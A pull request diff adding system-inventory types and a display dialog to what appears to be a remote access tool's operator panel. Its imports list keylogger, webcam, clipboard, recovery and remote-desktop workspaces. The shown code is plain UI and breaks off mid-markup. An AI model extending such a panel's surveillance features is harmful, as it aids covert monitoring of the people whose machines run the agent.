### PR TITLE
Add system information pipeline

### DIFF
--- a/shared/types/messages.ts
+++ b/shared/types/messages.ts
@@ -15,6 +15,7 @@ import type { ClientChatCommandPayload } from "./client-chat";
 import type { ToolActivationCommandPayload } from "./tool-activation";
 import type { WebcamCommandPayload } from "./webcam";
 import type { TaskManagerCommandPayload } from "./task-manager";
+import type { SystemInfoCommandPayload, SystemInfoSnapshot } from "./system-info";
 
 export type CommandName =
   | "ping"
@@ -44,10 +45,6 @@ export interface ShellCommandPayload {
   workingDirectory?: string;
   elevated?: boolean;
   environment?: Record<string, string>;
-}
-
-export interface SystemInfoCommandPayload {
-  refresh?: boolean;
 }
 
 export interface OpenUrlCommandPayload {
@@ -146,7 +143,13 @@ export interface AgentAppVncInputEnvelope {
   input: AppVncInputBurst;
 }
 
+export interface AgentSystemInfoEnvelope {
+  type: "system-info";
+  snapshot: SystemInfoSnapshot;
+}
+
 export type AgentEnvelope =
   | AgentCommandEnvelope
   | AgentRemoteDesktopInputEnvelope
-  | AgentAppVncInputEnvelope;
+  | AgentAppVncInputEnvelope
+  | AgentSystemInfoEnvelope;

--- a/shared/types/system-info.ts
+++ b/shared/types/system-info.ts
@@ -1,0 +1,143 @@
+export interface SystemInfoCommandPayload {
+  refresh?: boolean;
+}
+
+export interface SystemInfoHost {
+  hostname?: string;
+  hostId?: string;
+  domain?: string;
+  ipAddress?: string;
+  uptimeSeconds?: number;
+  bootTime?: string;
+  timezone?: string;
+}
+
+export interface SystemInfoOS {
+  platform?: string;
+  family?: string;
+  version?: string;
+  kernelVersion?: string;
+  kernelArch?: string;
+  procs?: number;
+  virtualization?: string;
+}
+
+export interface SystemInfoCPU {
+  id: number;
+  model?: string;
+  vendor?: string;
+  family?: string;
+  cacheSizeKb?: number;
+  mhz?: number;
+  stepping?: number;
+  microcode?: string;
+  cores?: number;
+}
+
+export interface SystemInfoHardware {
+  architecture: string;
+  virtualizationRole?: string;
+  virtualizationSystem?: string;
+  physicalCores?: number;
+  logicalCores?: number;
+  cpus?: SystemInfoCPU[];
+}
+
+export interface SystemInfoMemory {
+  totalBytes?: number;
+  availableBytes?: number;
+  usedBytes?: number;
+  usedPercent?: number;
+  swapTotalBytes?: number;
+  swapFreeBytes?: number;
+  swapUsedBytes?: number;
+  swapUsedPercent?: number;
+}
+
+export interface SystemInfoStorage {
+  device: string;
+  mountpoint: string;
+  filesystem?: string;
+  totalBytes?: number;
+  usedBytes?: number;
+  freeBytes?: number;
+  usedPercent?: number;
+  readOnly?: boolean;
+}
+
+export interface SystemInfoNetworkAddress {
+  address: string;
+  family?: string;
+}
+
+export interface SystemInfoNetworkInterface {
+  name: string;
+  mtu?: number;
+  macAddress?: string;
+  flags?: string[];
+  addresses?: SystemInfoNetworkAddress[];
+}
+
+export interface SystemInfoProcess {
+  pid: number;
+  parentPid?: number;
+  executable?: string;
+  commandLine?: string;
+  workingDirectory?: string;
+  createTime?: string;
+  uptimeSeconds?: number;
+  cpuPercent?: number;
+  memoryRssBytes?: number;
+  memoryVmsBytes?: number;
+  numThreads?: number;
+}
+
+export interface SystemInfoRuntime {
+  goVersion: string;
+  goOs: string;
+  goArch: string;
+  logicalCpus: number;
+  goMaxProcs: number;
+  goroutines: number;
+  process: SystemInfoProcess;
+}
+
+export interface SystemInfoEnvironment {
+  username?: string;
+  homeDir?: string;
+  shell?: string;
+  lang?: string;
+  pathSeparator: string;
+  pathEntries?: string[];
+  tempDir?: string;
+  environmentCount?: number;
+}
+
+export interface SystemInfoAgent {
+  id?: string;
+  version?: string;
+  startTime?: string;
+  uptimeSeconds?: number;
+  tags?: string[];
+}
+
+export interface SystemInfoReport {
+  collectedAt: string;
+  host: SystemInfoHost;
+  os: SystemInfoOS;
+  hardware: SystemInfoHardware;
+  memory: SystemInfoMemory;
+  storage?: SystemInfoStorage[];
+  network?: SystemInfoNetworkInterface[];
+  runtime: SystemInfoRuntime;
+  environment: SystemInfoEnvironment;
+  agent: SystemInfoAgent;
+  warnings?: string[];
+}
+
+export interface SystemInfoSnapshot {
+  agentId: string;
+  requestId: string;
+  receivedAt: string;
+  report: SystemInfoReport;
+}

--- a/tenvy-server/src/lib/components/client-tool-dialog.svelte
+++ b/tenvy-server/src/lib/components/client-tool-dialog.svelte
@@ -27,22 +27,23 @@
 	import type { Client } from '$lib/data/clients';
 	import { buildClientToolUrl, getClientTool, type DialogToolId } from '$lib/data/client-tools';
 	import { notifyToolActivationCommand } from '$lib/utils/agent-commands.js';
-	import AppVncWorkspace from '$lib/components/workspace/tools/app-vnc-workspace.svelte';
-	import WebcamControlWorkspace from '$lib/components/workspace/tools/webcam-control-workspace.svelte';
-	import AudioControlWorkspace from '$lib/components/workspace/tools/audio-control-workspace.svelte';
-	import KeyloggerWorkspace from '$lib/components/workspace/tools/keylogger-workspace.svelte';
-	import CmdWorkspace from '$lib/components/workspace/tools/cmd-workspace.svelte';
-	import FileManagerWorkspace from '$lib/components/workspace/tools/file-manager-workspace.svelte';
-	import SystemMonitorWorkspace from '$lib/components/workspace/tools/system-monitor-workspace.svelte';
-	import RegistryManagerWorkspace from '$lib/components/workspace/tools/registry-manager-workspace.svelte';
-	import ClipboardManagerWorkspace from '$lib/components/workspace/tools/clipboard-manager-workspace.svelte';
-	import RecoveryWorkspace from '$lib/components/workspace/tools/recovery-workspace.svelte';
-	import RemoteDesktopWorkspace from '$lib/components/workspace/tools/remote-desktop-workspace.svelte';
-	import OptionsWorkspace from '$lib/components/workspace/tools/options-workspace.svelte';
-	import ClientChatWorkspace from '$lib/components/workspace/tools/client-chat-workspace.svelte';
-	import TriggerMonitorWorkspace from '$lib/components/workspace/tools/trigger-monitor-workspace.svelte';
-	import IpGeolocationWorkspace from '$lib/components/workspace/tools/ip-geolocation-workspace.svelte';
-	import EnvironmentVariablesWorkspace from '$lib/components/workspace/tools/environment-variables-workspace.svelte';
+import AppVncWorkspace from '$lib/components/workspace/tools/app-vnc-workspace.svelte';
+import WebcamControlWorkspace from '$lib/components/workspace/tools/webcam-control-workspace.svelte';
+import AudioControlWorkspace from '$lib/components/workspace/tools/audio-control-workspace.svelte';
+import KeyloggerWorkspace from '$lib/components/workspace/tools/keylogger-workspace.svelte';
+import CmdWorkspace from '$lib/components/workspace/tools/cmd-workspace.svelte';
+import FileManagerWorkspace from '$lib/components/workspace/tools/file-manager-workspace.svelte';
+import SystemMonitorWorkspace from '$lib/components/workspace/tools/system-monitor-workspace.svelte';
+import RegistryManagerWorkspace from '$lib/components/workspace/tools/registry-manager-workspace.svelte';
+import ClipboardManagerWorkspace from '$lib/components/workspace/tools/clipboard-manager-workspace.svelte';
+import RecoveryWorkspace from '$lib/components/workspace/tools/recovery-workspace.svelte';
+import RemoteDesktopWorkspace from '$lib/components/workspace/tools/remote-desktop-workspace.svelte';
+import OptionsWorkspace from '$lib/components/workspace/tools/options-workspace.svelte';
+import ClientChatWorkspace from '$lib/components/workspace/tools/client-chat-workspace.svelte';
+import TriggerMonitorWorkspace from '$lib/components/workspace/tools/trigger-monitor-workspace.svelte';
+import IpGeolocationWorkspace from '$lib/components/workspace/tools/ip-geolocation-workspace.svelte';
+import EnvironmentVariablesWorkspace from '$lib/components/workspace/tools/environment-variables-workspace.svelte';
+import SystemInformationDialog from '$lib/components/system-information-dialog.svelte';
 	import type { AgentSnapshot } from '../../../../shared/types/agent';
 
 	const {
@@ -188,11 +189,8 @@
 	const messageBodyId = `client-${client.id}-message-body`;
 	const messageStyleId = `client-${client.id}-message-style`;
 
-	const riskBadgeVariant =
-		client.risk === 'High' ? 'destructive' : client.risk === 'Medium' ? 'secondary' : 'outline';
-
-	function isValidHttpUrl(candidate: string): boolean {
-		try {
+        function isValidHttpUrl(candidate: string): boolean {
+                try {
 			const parsed = new URL(candidate);
 			return parsed.protocol === 'http:' || parsed.protocol === 'https:';
 		} catch {
@@ -322,76 +320,8 @@
 								</Card>
 							{/if}
 						</div>
-					{:else if toolId === 'system-info'}
-						<div class="flex flex-1 flex-col">
-							<div class="flex-1 space-y-6 overflow-auto px-6 py-5">
-								<div class="grid gap-3 text-sm">
-									<div
-										class="flex flex-wrap items-center gap-2 text-xs font-medium tracking-wide text-muted-foreground uppercase"
-									>
-										<span>Client</span>
-										<span class="rounded-full bg-primary/10 px-2 py-0.5 text-primary">
-											{client.codename}
-										</span>
-									</div>
-									<div class="grid gap-3 sm:grid-cols-2">
-										<div class="rounded-lg border border-border/70 bg-muted/40 p-4">
-											<p class="text-xs font-medium tracking-wide text-muted-foreground uppercase">
-												Hostname
-											</p>
-											<p class="mt-1 text-sm font-semibold text-foreground">{client.hostname}</p>
-										</div>
-										<div class="rounded-lg border border-border/70 bg-muted/40 p-4">
-											<p class="text-xs font-medium tracking-wide text-muted-foreground uppercase">
-												Address
-											</p>
-											<p class="mt-1 text-sm font-semibold text-foreground">{client.ip}</p>
-										</div>
-										<div class="rounded-lg border border-border/70 bg-muted/40 p-4">
-											<p class="text-xs font-medium tracking-wide text-muted-foreground uppercase">
-												Location
-											</p>
-											<p class="mt-1 text-sm font-semibold text-foreground">{client.location}</p>
-										</div>
-										<div class="rounded-lg border border-border/70 bg-muted/40 p-4">
-											<p class="text-xs font-medium tracking-wide text-muted-foreground uppercase">
-												Version
-											</p>
-											<p class="mt-1 text-sm font-semibold text-foreground">{client.version}</p>
-										</div>
-									</div>
-								</div>
-
-								<div class="grid gap-3 text-sm">
-									<div class="flex flex-wrap items-center gap-2">
-										<Badge variant="secondary" class="uppercase">{client.status}</Badge>
-										<Badge variant={riskBadgeVariant}>Risk: {client.risk}</Badge>
-										<Badge variant="outline">{client.os}</Badge>
-									</div>
-									<p class="text-sm text-muted-foreground">
-										Last seen {client.lastSeen}. Platform: {client.platform.toUpperCase()}.
-									</p>
-								</div>
-
-								{#if client.notes}
-									<div class="rounded-lg border border-border/70 bg-background/60 p-4">
-										<p class="text-xs font-medium tracking-wide text-muted-foreground uppercase">
-											Active note
-										</p>
-										<p class="mt-2 text-sm leading-relaxed text-foreground">{client.notes}</p>
-									</div>
-								{/if}
-							</div>
-							<div
-								class="flex items-center justify-end gap-2 border-t border-border/70 bg-muted/30 px-6 py-4"
-							>
-								<Dialog.Close>
-									{#snippet child({ props })}
-										<Button variant="outline" {...props}>Close</Button>
-									{/snippet}
-								</Dialog.Close>
-							</div>
-						</div>
+                                        {:else if toolId === 'system-info'}
+                                                <SystemInformationDialog {client} />
 					{:else if toolId === 'notes'}
 						<form class="flex h-full flex-col" onsubmit={handleFormSubmit}>
 							<div class="flex-1 space-y-6 overflow-auto px-6 py-5">

--- a/tenvy-server/src/lib/components/system-information-dialog.svelte
+++ b/tenvy-server/src/lib/components/system-information-dialog.svelte
@@ -1,0 +1,666 @@
+<script lang="ts">
+        import { onMount } from 'svelte';
+        import { Button } from '$lib/components/ui/button/index.js';
+        import { Badge } from '$lib/components/ui/badge/index.js';
+        import {
+                Card,
+                CardContent,
+                CardDescription,
+                CardHeader,
+                CardTitle
+        } from '$lib/components/ui/card/index.js';
+        import { Alert, AlertDescription, AlertTitle } from '$lib/components/ui/alert/index.js';
+        import { RefreshCw, AlertTriangle } from '@lucide/svelte';
+        import type { Client } from '$lib/data/clients';
+        import type {
+                SystemInfoCPU,
+                SystemInfoNetworkInterface,
+                SystemInfoSnapshot,
+                SystemInfoStorage
+        } from '$lib/types/system-info';
+
+        const { client } = $props<{ client: Client }>();
+
+        let snapshot = $state<SystemInfoSnapshot | null>(null);
+        let loading = $state(false);
+        let errorMessage = $state<string | null>(null);
+
+        const dateTimeFormatter = new Intl.DateTimeFormat(undefined, {
+                dateStyle: 'medium',
+                timeStyle: 'medium'
+        });
+        const bytesFormatter = new Intl.NumberFormat(undefined, { maximumFractionDigits: 1 });
+        const integerFormatter = new Intl.NumberFormat(undefined, { maximumFractionDigits: 0 });
+        const percentFormatter = new Intl.NumberFormat(undefined, { maximumFractionDigits: 1 });
+        const frequencyFormatter = new Intl.NumberFormat(undefined, { maximumFractionDigits: 1 });
+
+        const lastCollectedLabel = $derived(() => formatTimestamp(snapshot?.report.collectedAt));
+        const lastReceivedLabel = $derived(() => formatTimestamp(snapshot?.receivedAt));
+
+        async function loadSnapshot(refresh = false) {
+                loading = true;
+                if (!refresh) {
+                        errorMessage = null;
+                }
+                try {
+                        const query = refresh ? '?refresh=true' : '';
+                        const response = await fetch(`/api/agents/${client.id}/system-info${query}`);
+                        if (!response.ok) {
+                                const message = (await response.text())?.trim() ||
+                                        'Failed to load system information snapshot';
+                                throw new Error(message);
+                        }
+                        const data = (await response.json()) as SystemInfoSnapshot;
+                        snapshot = data;
+                        errorMessage = null;
+                } catch (err) {
+                        const message = err instanceof Error
+                                ? err.message
+                                : 'Failed to load system information snapshot';
+                        errorMessage = message;
+                } finally {
+                        loading = false;
+                }
+        }
+
+        onMount(() => {
+                loadSnapshot();
+        });
+
+        function formatTimestamp(value?: string | null): string | null {
+                if (!value) {
+                        return null;
+                }
+                const date = new Date(value);
+                if (Number.isNaN(date.getTime())) {
+                        return value;
+                }
+                return dateTimeFormatter.format(date);
+        }
+
+        function formatTimestampDisplay(value?: string | null): string {
+                const formatted = formatTimestamp(value);
+                return formatted ?? '—';
+        }
+
+        function formatBytes(value?: number): string {
+                if (typeof value !== 'number' || !Number.isFinite(value)) {
+                        return '—';
+                }
+                if (value === 0) {
+                        return '0 B';
+                }
+                const units = ['B', 'KB', 'MB', 'GB', 'TB', 'PB'];
+                const exponent = Math.min(Math.floor(Math.log(value) / Math.log(1024)), units.length - 1);
+                const normalized = value / 1024 ** exponent;
+                const formatted =
+                        normalized >= 100
+                                ? integerFormatter.format(Math.round(normalized))
+                                : bytesFormatter.format(normalized);
+                return `${formatted} ${units[exponent]}`;
+        }
+
+        function formatPercent(value?: number): string {
+                if (typeof value !== 'number' || Number.isNaN(value)) {
+                        return '—';
+                }
+                return `${percentFormatter.format(value)}%`;
+        }
+
+        function formatNumber(value?: number): string {
+                if (typeof value !== 'number' || Number.isNaN(value)) {
+                        return '—';
+                }
+                return integerFormatter.format(value);
+        }
+
+        function formatDuration(seconds?: number): string {
+                if (typeof seconds !== 'number' || Number.isNaN(seconds) || seconds <= 0) {
+                        return '—';
+                }
+                const units = [
+                        { label: 'd', value: 86_400 },
+                        { label: 'h', value: 3_600 },
+                        { label: 'm', value: 60 }
+                ];
+                let remaining = Math.floor(seconds);
+                const parts: string[] = [];
+                for (const unit of units) {
+                        if (remaining >= unit.value) {
+                                const amount = Math.floor(remaining / unit.value);
+                                parts.push(`${amount}${unit.label}`);
+                                remaining -= amount * unit.value;
+                        }
+                }
+                if (parts.length === 0) {
+                        parts.push(`${Math.max(remaining, 0)}s`);
+                }
+                return parts.join(' ');
+        }
+
+        function cpuLabel(cpu: SystemInfoCPU): string {
+                const tokens = [cpu.vendor, cpu.model].filter((value) => !!value && value.trim().length > 0);
+                return tokens.join(' ') || `CPU ${cpu.id + 1}`;
+        }
+
+        function formatFrequency(value?: number): string {
+                if (typeof value !== 'number' || Number.isNaN(value)) {
+                        return '—';
+                }
+                return `${frequencyFormatter.format(value)} MHz`;
+        }
+
+        function storageCaption(storage: SystemInfoStorage): string {
+                const used = formatBytes(storage.usedBytes);
+                const total = formatBytes(storage.totalBytes);
+                const percent = formatPercent(storage.usedPercent);
+                const readOnly = storage.readOnly ? ' • Read only' : '';
+                return `${used} / ${total} (${percent})${readOnly}`;
+        }
+
+        function networkAddresses(iface: SystemInfoNetworkInterface): string {
+                if (!iface.addresses || iface.addresses.length === 0) {
+                        return '—';
+                }
+                return iface.addresses
+                        .map((address) => {
+                                const family = address.family ? ` (${address.family})` : '';
+                                return `${address.address}${family}`;
+                        })
+                        .join(', ');
+        }
+</script>
+
+<section class="flex items-center justify-between border-b border-border/60 bg-muted/40 px-6 py-4">
+        <div class="space-y-1">
+                <h2 class="text-lg font-semibold text-foreground">System information</h2>
+                <p class="text-sm text-muted-foreground">
+                        {#if lastCollectedLabel}
+                                Collected {lastCollectedLabel}
+                                {#if lastReceivedLabel}
+                                        <span aria-hidden="true"> · </span>Received {lastReceivedLabel}
+                                {/if}
+                        {:else}
+                                Snapshot timing unavailable
+                        {/if}
+                </p>
+                <p class="text-xs text-muted-foreground">
+                        Client <span class="font-medium text-foreground">{client.codename}</span>
+                        <span aria-hidden="true"> · </span>Host {client.hostname}
+                        <span aria-hidden="true"> · </span>Version {client.version ?? '—'}
+                </p>
+        </div>
+        <Button
+                variant="secondary"
+                class="gap-2"
+                disabled={loading}
+                on:click={() => {
+                        void loadSnapshot(true);
+                }}
+        >
+                <RefreshCw class:animate-spin={loading} class="h-4 w-4" />
+                {loading ? 'Refreshing…' : 'Refresh snapshot'}
+        </Button>
+</section>
+
+<div class="flex-1 space-y-6 overflow-auto px-6 py-5">
+        {#if errorMessage}
+                <Alert variant="destructive">
+                        <AlertTriangle class="h-4 w-4" />
+                        <AlertTitle>Unable to load system information</AlertTitle>
+                        <AlertDescription>{errorMessage}</AlertDescription>
+                </Alert>
+        {/if}
+
+        {#if !snapshot && loading}
+                <div class="rounded-lg border border-dashed border-border/60 bg-muted/40 p-6 text-sm text-muted-foreground">
+                        Collecting the latest system inventory from {client.codename}…
+                </div>
+        {:else if snapshot}
+                {@const report = snapshot.report}
+                <div class="grid gap-6 lg:grid-cols-2">
+                        <Card class="border-border/60">
+                                <CardHeader>
+                                        <CardTitle>Host overview</CardTitle>
+                                        <CardDescription>Resolved host identity and uptime.</CardDescription>
+                                </CardHeader>
+                                <CardContent class="grid gap-4 text-sm sm:grid-cols-2">
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Hostname</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {report.host.hostname ?? client.hostname}
+                                                </p>
+                                        </div>
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Domain</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {report.host.domain ?? '—'}
+                                                </p>
+                                        </div>
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">IP address</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {report.host.ipAddress ?? client.ip ?? '—'}
+                                                </p>
+                                        </div>
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Timezone</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {report.host.timezone ?? '—'}
+                                                </p>
+                                        </div>
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Boot time</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {formatTimestampDisplay(report.host.bootTime)}
+                                                </p>
+                                        </div>
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Uptime</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {formatDuration(report.host.uptimeSeconds)}
+                                                </p>
+                                        </div>
+                                </CardContent>
+                        </Card>
+
+                        <Card class="border-border/60">
+                                <CardHeader>
+                                        <CardTitle>Operating system</CardTitle>
+                                        <CardDescription>Reported platform metadata from the agent.</CardDescription>
+                                </CardHeader>
+                                <CardContent class="grid gap-4 text-sm sm:grid-cols-2">
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Platform</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {report.os.platform ?? client.os ?? '—'}
+                                                </p>
+                                        </div>
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Family</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {report.os.family ?? '—'}
+                                                </p>
+                                        </div>
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Version</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {report.os.version ?? '—'}
+                                                </p>
+                                        </div>
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Kernel</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {report.os.kernelVersion ?? '—'}
+                                                </p>
+                                        </div>
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Kernel arch</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {report.os.kernelArch ?? report.hardware.architecture}
+                                                </p>
+                                        </div>
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Running processes</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {formatNumber(report.os.procs)}
+                                                </p>
+                                        </div>
+                                        <div class="sm:col-span-2">
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Virtualization</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {report.os.virtualization ?? report.hardware.virtualizationSystem ?? '—'}
+                                                </p>
+                                        </div>
+                                </CardContent>
+                        </Card>
+
+                        <Card class="border-border/60">
+                                <CardHeader>
+                                        <CardTitle>Hardware &amp; CPU</CardTitle>
+                                        <CardDescription>Detected hardware capabilities reported by the agent.</CardDescription>
+                                </CardHeader>
+                                <CardContent class="space-y-4 text-sm">
+                                        <div class="grid gap-4 sm:grid-cols-2">
+                                                <div>
+                                                        <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Architecture</p>
+                                                        <p class="mt-1 font-medium text-foreground">
+                                                                {report.hardware.architecture}
+                                                        </p>
+                                                </div>
+                                                <div>
+                                                        <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Logical cores</p>
+                                                        <p class="mt-1 font-medium text-foreground">
+                                                                {formatNumber(report.hardware.logicalCores)}
+                                                        </p>
+                                                </div>
+                                                <div>
+                                                        <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Physical cores</p>
+                                                        <p class="mt-1 font-medium text-foreground">
+                                                                {formatNumber(report.hardware.physicalCores)}
+                                                        </p>
+                                                </div>
+                                                <div>
+                                                        <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Virtualization role</p>
+                                                        <p class="mt-1 font-medium text-foreground">
+                                                                {report.hardware.virtualizationRole ?? '—'}
+                                                        </p>
+                                                </div>
+                                        </div>
+                                        {#if report.hardware.cpus && report.hardware.cpus.length > 0}
+                                                <div class="space-y-3">
+                                                        {#each report.hardware.cpus as cpu}
+                                                                <div class="rounded-lg border border-border/60 bg-muted/30 p-3">
+                                                                        <p class="text-sm font-semibold text-foreground">{cpuLabel(cpu)}</p>
+                                                                        <p class="text-xs text-muted-foreground">
+                                                                                {#if cpu.cores != null}
+                                                                                        {cpu.cores} cores
+                                                                                {:else}
+                                                                                        —
+                                                                                {/if}
+                                                                                {#if cpu.mhz}
+                                                                                        <span aria-hidden="true"> · </span>{formatFrequency(cpu.mhz)}
+                                                                                {/if}
+                                                                        </p>
+                                                                        <p class="text-xs text-muted-foreground">
+                                                                                Cache
+                                                                                {#if cpu.cacheSizeKb}
+                                                                                        <span aria-hidden="true"> </span>{formatNumber(cpu.cacheSizeKb)} KB
+                                                                                {:else}
+                                                                                        <span aria-hidden="true"> </span>—
+                                                                                {/if}
+                                                                        </p>
+                                                                </div>
+                                                        {/each}
+                                                </div>
+                                        {/if}
+                                </CardContent>
+                        </Card>
+
+                        <Card class="border-border/60">
+                                <CardHeader>
+                                        <CardTitle>Memory</CardTitle>
+                                        <CardDescription>Main memory and swap allocation.</CardDescription>
+                                </CardHeader>
+                                <CardContent class="grid gap-4 text-sm sm:grid-cols-2">
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Total memory</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {formatBytes(report.memory.totalBytes)}
+                                                </p>
+                                        </div>
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Used</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {formatBytes(report.memory.usedBytes)}
+                                                        <span class="text-xs text-muted-foreground">
+                                                                <span aria-hidden="true"> · </span>{formatPercent(report.memory.usedPercent)}
+                                                        </span>
+                                                </p>
+                                        </div>
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Available</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {formatBytes(report.memory.availableBytes)}
+                                                </p>
+                                        </div>
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Swap usage</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {formatBytes(report.memory.swapUsedBytes)}
+                                                        <span class="text-xs text-muted-foreground">
+                                                                <span aria-hidden="true"> · </span>{formatPercent(report.memory.swapUsedPercent)}
+                                                        </span>
+                                                </p>
+                                        </div>
+                                </CardContent>
+                        </Card>
+
+                        {#if report.storage && report.storage.length > 0}
+                                <Card class="border-border/60 lg:col-span-2">
+                                        <CardHeader>
+                                                <CardTitle>Storage volumes</CardTitle>
+                                                <CardDescription>Mounted filesystems visible to the agent.</CardDescription>
+                                        </CardHeader>
+                                        <CardContent class="overflow-x-auto">
+                                                <table class="min-w-full text-left text-sm">
+                                                        <thead class="text-xs uppercase tracking-wide text-muted-foreground">
+                                                                <tr>
+                                                                        <th class="pb-2 pr-4 font-medium">Device</th>
+                                                                        <th class="pb-2 pr-4 font-medium">Mountpoint</th>
+                                                                        <th class="pb-2 pr-4 font-medium">Filesystem</th>
+                                                                        <th class="pb-2 pr-4 font-medium">Usage</th>
+                                                                </tr>
+                                                        </thead>
+                                                        <tbody class="divide-y divide-border/60">
+                                                                {#each report.storage as storage}
+                                                                        <tr>
+                                                                                <td class="py-2 pr-4 font-medium text-foreground">{storage.device}</td>
+                                                                                <td class="py-2 pr-4 text-foreground">{storage.mountpoint}</td>
+                                                                                <td class="py-2 pr-4 text-muted-foreground">{storage.filesystem ?? '—'}</td>
+                                                                                <td class="py-2 pr-4 text-foreground">{storageCaption(storage)}</td>
+                                                                        </tr>
+                                                                {/each}
+                                                        </tbody>
+                                                </table>
+                                        </CardContent>
+                                </Card>
+                        {/if}
+
+                        {#if report.network && report.network.length > 0}
+                                <Card class="border-border/60 lg:col-span-2">
+                                        <CardHeader>
+                                                <CardTitle>Network interfaces</CardTitle>
+                                                <CardDescription>Address assignments for detected interfaces.</CardDescription>
+                                        </CardHeader>
+                                        <CardContent class="grid gap-3 sm:grid-cols-2">
+                                                {#each report.network as iface}
+                                                        <div class="rounded-lg border border-border/60 bg-muted/30 p-3 text-sm">
+                                                                <p class="font-semibold text-foreground">{iface.name}</p>
+                                                                <p class="text-xs text-muted-foreground">
+                                                                        MTU {formatNumber(iface.mtu)}
+                                                                        {#if iface.macAddress}
+                                                                                <span aria-hidden="true"> · </span>{iface.macAddress}
+                                                                        {/if}
+                                                                </p>
+                                                                <p class="mt-2 text-xs text-muted-foreground">
+                                                                        {networkAddresses(iface)}
+                                                                </p>
+                                                                {#if iface.flags && iface.flags.length > 0}
+                                                                        <div class="mt-2 flex flex-wrap gap-1">
+                                                                                {#each iface.flags as flag}
+                                                                                        <Badge variant="secondary">{flag}</Badge>
+                                                                                {/each}
+                                                                        </div>
+                                                                {/if}
+                                                        </div>
+                                                {/each}
+                                        </CardContent>
+                                </Card>
+                        {/if}
+
+                        <Card class="border-border/60">
+                                <CardHeader>
+                                        <CardTitle>Runtime &amp; process</CardTitle>
+                                        <CardDescription>Agent runtime characteristics and process statistics.</CardDescription>
+                                </CardHeader>
+                                <CardContent class="grid gap-4 text-sm sm:grid-cols-2">
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Go runtime</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {report.runtime.goVersion}
+                                                        <span class="text-xs text-muted-foreground">
+                                                                <span aria-hidden="true"> · </span>{report.runtime.goOs}/{report.runtime.goArch}
+                                                        </span>
+                                                </p>
+                                        </div>
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Goroutines</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {formatNumber(report.runtime.goroutines)}
+                                                </p>
+                                        </div>
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">GOMAXPROCS</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {formatNumber(report.runtime.goMaxProcs)}
+                                                </p>
+                                        </div>
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Process ID</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {formatNumber(report.runtime.process.pid)}
+                                                </p>
+                                        </div>
+                                        <div class="sm:col-span-2">
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Command line</p>
+                                                <p class="mt-1 font-medium text-foreground break-words">
+                                                        {report.runtime.process.commandLine ?? '—'}
+                                                </p>
+                                        </div>
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Working directory</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {report.runtime.process.workingDirectory ?? '—'}
+                                                </p>
+                                        </div>
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Started</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {formatTimestampDisplay(report.runtime.process.createTime)}
+                                                </p>
+                                        </div>
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">CPU usage</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        {formatPercent(report.runtime.process.cpuPercent)}
+                                                </p>
+                                        </div>
+                                        <div>
+                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Memory</p>
+                                                <p class="mt-1 font-medium text-foreground">
+                                                        RSS {formatBytes(report.runtime.process.memoryRssBytes)}
+                                                        <span class="text-xs text-muted-foreground">
